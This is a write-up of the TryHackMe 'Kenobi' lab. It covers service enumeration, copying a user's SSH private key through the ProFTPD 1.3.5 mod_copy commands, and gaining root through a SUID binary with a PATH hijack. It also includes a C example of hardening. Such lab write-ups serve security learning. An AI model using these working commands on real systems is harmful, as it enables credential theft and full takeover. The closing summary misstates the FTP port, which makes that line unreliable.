Kenobi - THM Write-Up

Difficulty - Easy

Description from THM

Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.

The Kenobi room in TryHackMe has several tasks for us to complete. I am following along with the steps in this room and I'll answer the questions as we go along; however, please know I will not share any credentials or flags, as I hope you will attempt this on your own as well!

Let's begin!


Tools

  • Nmap
  • gobuster
  • smbclient
  • netcat
  • searchsploit

Task 1 - Deploy the machine and scan the network

I am using the THM AttackBox to complete this room.

First we'll run an nmap scan of the target machine!

root@ip-10-10-204-174:~# nmap -sC -sV 10.10.116.87

Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-12 23:40 GMT
Nmap scan report for ip-10-10-116-87.eu-west-1.compute.internal (10.10.116.87)
Host is up (0.0012s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      37226/udp  mountd
|   100005  1,2,3      38223/tcp  mountd
|   100021  1,3,4      36819/tcp  nlockmgr
|   100021  1,3,4      54561/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 02:5B:4D:DE:0D:87 (Unknown)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2022-03-12T17:41:02-06:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-03-12 23:41:02
|_  start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds

How many ports are open? There are 7 ports open.

  • Port 21 - FTP (ProFTPD 1.3.5)
  • Port 22 - SSH
  • Port 80 - HTTP
  • Port 111 - RPCBind
  • Port 139/445 - SMB
  • Port 2049 - NFS_ACL

Let's take a quick peek at the web server on Port 80 first. The nmap scan also showed us the /admin.html page (listed as a disallowed entry in robots.txt).

80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

We get a lovely photo of Obi-Wan Kenobi fighting Anakin Skywalker.

When we go to the /admin.html page we get a GIF of Admiral Ackbar saying "IT'S A TRAP!"

So far these are the only two web pages we can look at, so let's give gobuster a try and see if we can find any more directories.

root@ip-10-10-204-174:~# gobuster dir -u http://10.10.116.87/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.116.87/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2022/03/13 00:02:32 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2022/03/13 00:02:32 Finished
===============================================================

Nothing useful for us, so let's move on and try to enumerate smb for shares!

Task 2 - Enumerating Samba for shares

To enumerate SMB shares we can use nmap. Nmap has a script that lets us do so!

We can do this with the following command:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>

  • -p - we can select the port we're using, in this case Port 445 (SMB has two ports: 139 (older version of SMB) and 445 (later versions))
  • --script - we use this switch to select the script(s) we want to use

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 02:5B:4D:DE:0D:87 (Unknown)

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.116.87\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.116.87\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.116.87\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

How many shares have been found? There are 3 shares:

  • \\10.10.116.87\IPC$
  • \\10.10.116.87\anonymous
  • \\10.10.116.87\print$

Now let's check out the \\10.10.116.87\anonymous share first, since it looks like the most interesting one!

We can use the following command, which uses smbclient to access this share:

smbclient //<ip>/anonymous

When it asks for a password, just hit ENTER, since we haven't discovered any password(s) yet.

root@ip-10-10-204-174:~# smbclient //10.10.116.87/anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 11:49:09 2019
  ..                                  D        0  Wed Sep  4 11:56:07 2019
  log.txt                             N    12237  Wed Sep  4 11:49:09 2019

        9204224 blocks of size 1024. 6876652 blocks available

What is the file that we see? We can see the log.txt file. To retrieve it we can run get log.txt from the smb prompt, which downloads it so we can open it on our machine.

Upon opening it, we get information about an SSH key generated for Kenobi and information about the ProFTPD server.

Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): 
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
# This is a basic ProFTPD configuration file (rename it to 
# 'proftpd.conf' for actual use.  It establishes a single server
# and a single anonymous login.  It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.

ServerName            "ProFTPD Default Installation"
ServerType            standalone
DefaultServer            on

# Port 21 is the standard FTP port.
Port                21

What port is FTP running on? We know from earlier and the information in the file that FTP is on Port 21.

Let's continue enumerating though! From our nmap scan earlier, Port 111 was running rpcbind.

Here's a snippet of what this server is from THM:

This is just a server that converts remote procedure call (RPC) program numbers into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number it's prepared to serve.

In our case, port 111 gives us access to a network file system (NFS). We can use nmap to enumerate this with the following command:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <ip>

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount: 
|_  /var *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836980.0  6876648.0  22%   16.0T        32000
MAC Address: 02:5B:4D:DE:0D:87 (Unknown)

What mount can we see? We can see /var.

We've done quite a bit of enumerating, so let's move onto the third task now.

Task 3 - Gain initial access with ProFtpd

Here is a description from THM for ProFtpd:

ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems. It's also been vulnerable in past software versions.

Let's figure out the version of ProFtpd. We can check our nmap scan from earlier, which shows us version 1.3.5. Or we can use netcat to connect to the machine on the FTP port.

root@ip-10-10-204-174:~# nc 10.10.116.87 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.116.87]

THM recommends we use searchsploit to find exploits for our version.

root@ip-10-10-204-174:~# searchsploit proftpd 1.3.5
[i] Found (#2): /opt/searchsploit/files_exploits.csv
[i] To remove this message, please edit "/opt/searchsploit/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#2): /opt/searchsploit/files_shellcodes.csv
[i] To remove this message, please edit "/opt/searchsploit/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Executi | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command  | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                  | linux/remote/36742.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

Here is another note from THM:

You should have found an exploit from ProFtpd's mod_copy module.

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

Earlier we gathered that the FTP service is running as the Kenobi user and that an SSH key was generated for that user. We're now going to copy Kenobi's private key using the commands we just learned about from THM (SITE CPFR and SITE CPTO).

To do this we need to run netcat again and run the commands like so:

root@ip-10-10-204-174:~# nc 10.10.116.87 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.116.87]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

What this did was copy from (CPFR) the /home/kenobi/.ssh/id_rsa file and copy it to (CPTO) /var/tmp/id_rsa (remember the /var mount we discovered earlier).

We'll need to mount the /var export on our machine so we can reach /var/tmp (these commands are provided by THM):

mkdir /mnt/kenobiNFS

mount machine_ip:/var /mnt/kenobiNFS

ls -la /mnt/kenobiNFS

root@ip-10-10-204-174:~# sudo mkdir /mnt/kenobiNFS
root@ip-10-10-204-174:~# sudo mount 10.10.116.87:/var /mnt/kenobiNFS
root@ip-10-10-204-174:~# ls -la /mnt/kenobiNFS/
total 56
drwxr-xr-x 14 root root  4096 Sep  4  2019 .
drwxr-xr-x  3 root root  4096 Mar 13 01:31 ..
drwxr-xr-x  2 root root  4096 Sep  4  2019 backups
drwxr-xr-x  9 root root  4096 Sep  4  2019 cache
drwxrwxrwt  2 root root  4096 Sep  4  2019 crash
drwxr-xr-x 40 root root  4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff 4096 Apr 12  2016 local
lrwxrwxrwx  1 root root     9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root lxd   4096 Sep  4  2019 log
drwxrwsr-x  2 root mail  4096 Feb 26  2019 mail
drwxr-xr-x  2 root root  4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root     4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root  4096 Jan 29  2019 snap
drwxr-xr-x  5 root root  4096 Sep  4  2019 spool
drwxrwxrwt  6 root root  4096 Mar 13 01:17 tmp
drwxr-xr-x  3 root root  4096 Sep  4  2019 www

The network mount is on our machine. Now we can attempt to log into Kenobi's account: we copy the id_rsa file, restrict its permissions so SSH will accept it, and log in using SSH.

root@ip-10-10-204-174:~# cp /mnt/kenobiNFS/tmp/id_rsa .
root@ip-10-10-204-174:~# sudo chmod 600 id_rsa
root@ip-10-10-204-174:~# ssh -i id_rsa kenobi@10.10.116.87
The authenticity of host '10.10.116.87 (10.10.116.87)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.116.87' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$

We now have access as the Kenobi user! THM now wants us to get the user flag:

kenobi@kenobi:~$ ls 
share  user.txt
kenobi@kenobi:~$ cat user.txt 
<user flag here>

Task 4 - Privilege Escalation with Path Variable Manipulation

This is our final task! Let's read what THM has to say about SUID bits:

SUID bits can be dangerous. Some binaries such as passwd need to be run with elevated privileges (as it's resetting your password on the system); however, other custom files that have the SUID bit can lead to all sorts of issues.

THM provides us with a command to use to help us search the system for these types of files:

find / -perm -u=s -type f 2>/dev/null

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

What file looks particularly out of the ordinary? The /usr/bin/menu looks a bit odd. It could be worth checking out.

Run the binary, how many options appear?

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

There are 3 choices for us to choose from.

Let's continue with the task! We need to get the root flag. In order to do this, we'll need to manipulate our path to gain a root shell. THM provides us with the commands to do this:

kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
#

THM explains why we did this:

We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, it's using our path variable to find the "curl" binary, which is actually a version of /usr/sh; and as this file is run as root, it runs our shell as root!
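To make the root cause concrete, here is an added example (not code from the room or from this write-up) of a hypothetical SUID menu program written both ways: the unsafe version names curl without a path and so trusts whatever PATH the caller exported, while the hardened version pins absolute paths, runs the tool with a fixed environment and drops the SUID identity first. The labels mirror the three options above; the commands behind them are my assumption.

```c
#define _POSIX_C_SOURCE 200809L /* fork/execve/waitpid/setenv prototypes */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* UNSAFE pattern: system() runs "/bin/sh -c ...", and the shell resolves
 * the bare name "curl" through whatever PATH the caller exported. */
int menu_unsafe(int choice)
{
    return choice == 1 ? system("curl -I localhost") : -1;
}

/* HARDENED: each option is a fixed absolute-path argv, so no PATH lookup
 * ever happens, whatever the caller's environment says (commands assumed). */
struct menu_entry { const char *label; const char *argv[4]; };
static const struct menu_entry MENU[] = {
    { "status check",   { "/usr/bin/curl", "-I", "localhost", NULL } },
    { "kernel version", { "/bin/uname", "-r", NULL, NULL } },
    { "ifconfig",       { "/sbin/ifconfig", NULL, NULL, NULL } },
};
#define MENU_LEN (sizeof MENU / sizeof MENU[0])

/* Only this environment reaches the child: a caller-set PATH, LD_PRELOAD or IFS never does. */
static char path_env[] = "PATH=/usr/bin:/bin";
static char *const CLEAN_ENV[] = { path_env, NULL };

/* Pinned program path for a 1-based menu choice, or NULL if out of range. */
const char *resolve_choice(int choice)
{
    if (choice < 1 || (size_t)choice > MENU_LEN) return NULL;
    return MENU[choice - 1].argv[0];
}

/* Runs argv (argv[0] absolute) as the real user with CLEAN_ENV; returns the exit status, 127 if exec fails, -1 on error. */
int run_argv(const char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Drop the SUID identity first: these tools need no privilege. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(127);
        execve(argv[0], (char *const *)argv, CLEAN_ENV);
        _exit(127); /* only reached if execve failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int run_choice(int choice)
{
    return resolve_choice(choice) ? run_argv(MENU[choice - 1].argv) : -1;
}
```

Calling run_choice() from a SUID wrapper behaves the same no matter what the caller placed in /tmp or exported in PATH, which is exactly the property /usr/bin/menu lacks.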

All that's left for us to do is find the root flag! We can run the following command to get it:

# cat /root/root.txt

Summary

I really enjoyed this Star Wars themed room! Especially since the new Obi-Wan Kenobi show is going to come out on Disney+ soon! We learned quite a lot in this room and practiced looking for samba shares and exploiting ProFtpd on Port 111. There are some things I personally have not done before such as getting a root shell through /usr/bin/menu. That is something I (we) should study on and look into. I'm happy that TryHackMe gave us some guidance boosts. Since this is considered one of the easy rooms, I know in the near future when I attempt the medium and hard levels THM won't hold our hands! But this is part of the learning process and getting used to using various tools! I hope you enjoyed this and I'll be posting more write-ups soon!